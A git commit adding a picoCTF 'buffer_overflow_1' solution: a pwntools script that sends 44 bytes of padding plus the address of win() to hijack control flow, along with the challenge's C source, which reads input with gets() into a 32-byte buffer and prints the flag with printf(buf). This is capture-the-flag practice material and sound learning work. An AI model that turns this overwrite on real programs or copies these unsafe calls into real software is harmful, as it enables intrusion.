pwn/buffer_overflow_1

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-03 19:33:13 +02:00
parent 4c40d47aa5
commit 2e33defa56
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
3 changed files with 73 additions and 0 deletions

31
pwn/buffer_overflow_1/solve.py Executable file
View File

@ -0,0 +1,31 @@
#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
r.recvuntil(b"Please enter your string:")
offset = 44 # found with pwndbg
payload = b'A' * offset + p32(exe.sym.win)
r.sendline(payload)
print(r.recvall())
r.close()
if __name__ == "__main__":
main()

BIN
pwn/buffer_overflow_1/vuln Executable file

Binary file not shown.

View File

@ -0,0 +1,42 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}